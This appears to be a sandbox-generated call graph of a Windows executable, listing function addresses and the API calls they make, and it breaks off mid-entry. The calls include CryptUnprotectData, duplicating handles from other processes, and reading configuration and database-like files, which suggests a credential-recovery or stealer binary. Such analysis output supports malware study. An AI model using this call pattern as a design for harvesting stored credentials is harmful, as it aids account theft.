38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 free 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab free free 38880->38932 38881->38880 38883 40b633 free 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX free 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 free 38923->38925 38926 40aa04 free 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab free free 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 free 39322->39323 39324 40cf14 39323->39324 39350 40b1ab free free 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 free 39331->39332 39333 40cc15 39332->39333 39334 40aa04 free 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab free free 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 free 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy free free 39377->39399 39379 40cedd 39380 40aa04 free 39379->39380 39381 40cee5 39380->39381 39382 40aa04 free 39381->39382 39383 40ceed 39382->39383 39384 40aa04 free 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy free free 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 39799->39790 39802->39799 39803 41bf3a 39802->39803 39804 41bed1 39802->39804 39807 41bee7 39802->39807 39830 4446ce 11 API calls 39803->39830 39806 41bef0 39804->39806 39809 41bee2 39804->39809 39806->39807 39808 41bf01 39806->39808 39807->39799 39831 41a453 85 API calls 39807->39831 39810 41bf24 memset 39808->39810 39812 41bf14 39808->39812 39828 418a6d memset memcpy memset 39808->39828 39816 41ac13 39809->39816 39810->39799 39829 41a223 memset memcpy memset 39812->39829 39815 41bf20 39815->39810 39817 41ac52 39816->39817 39818 41ac3f memset 39816->39818 39821 41ac6a 39817->39821 39832 41dc14 19 API calls 39817->39832 39819 41acd9 39818->39819 39819->39807 39822 41519d 6 API calls 39821->39822 39823 41aca1 39821->39823 39822->39823 39823->39819 39824 41acc0 memset 39823->39824 39825 41accd memcpy 39823->39825 39824->39819 39825->39819 39826->39799 39827->39802 39828->39812 39829->39815 39830->39807 39832->39821 39833->39793 39834 417bc5 39836 417c61 39834->39836 39839 417bda 39834->39839 39835 417bf6 UnmapViewOfFile CloseHandle 39835->39835 39835->39839 39838 417c2c 39838->39839 39846 41851e 18 API calls 39838->39846 39839->39835 39839->39836 39839->39838 39841 4175b7 39839->39841 39842 4175d6 CloseHandle 39841->39842 39843 4175c8 39842->39843 39844 4175df 39842->39844 39843->39844 39845 4175ce Sleep 39843->39845 39844->39839 39845->39842 39846->39838 39847 4148b6 FindResourceW 39848 4148cf SizeofResource 39847->39848 39851 4148f9 39847->39851 39849 4148e0 LoadResource 39848->39849 39848->39851 39850 4148ee LockResource 39849->39850 39849->39851 39850->39851 39852 441b3f 39862 43a9f6 39852->39862 39854 441b61 40035 4386af memset 39854->40035 39856 44189a 39857 4418e2 39856->39857 39859 442bd4 39856->39859 39858 4418ea 39857->39858 40036 4414a9 12 API calls 39857->40036 39859->39858 40037 441409 memset 39859->40037 39863 43aa20 39862->39863 39870 43aadf 39862->39870 39864 43aa34 memset 39863->39864 39863->39870 39865 43aa56 39864->39865 39866 43aa4d 39864->39866 40038 43a6e7 39865->40038 40046 42c02e memset 39866->40046 39870->39854 39872 43aad3 40048 4169a7 11 API calls 39872->40048 39873 43aaae 39873->39870 39873->39872 39888 43aae5 39873->39888 39874 43ac18 39877 43ac47 39874->39877 40050 42bbd5 memcpy memcpy memcpy memset memcpy 39874->40050 39878 